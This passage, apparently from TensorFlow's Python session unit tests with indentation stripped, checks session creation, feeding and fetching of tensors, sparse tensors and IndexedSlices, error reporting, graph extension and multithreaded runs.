result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]],
dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config = config_pb2.ConfigProto()
pool = config.session_inter_op_thread_pool.add()
with session.Session(config=config) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual(42.0, res[0])
self.assertEqual(None, res[1])
self.assertEqual(44.0, res[2])
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[4])
self.assertEqual(63.0, sess.run(v))
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(42.0, res[0])
self.assertEqual(None, res[1])
self.assertEqual(44.0, res[2])
self.assertEqual(42.0, res[3])
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c), ABC(a=a, b=b, c=c),
{'a': a.name, 'c': c, 'b': b}])
self.assertTrue(isinstance(res, list))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c),
{'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, tuple))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(DEFG(d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({'d': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {'a': a.name, 'c': c, 'b': b}})
self.assertTrue(isinstance(res, dict))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testFeedSparePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32,
shape=shape,
name='placeholder1')
self.assertAllEqual(sp.shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
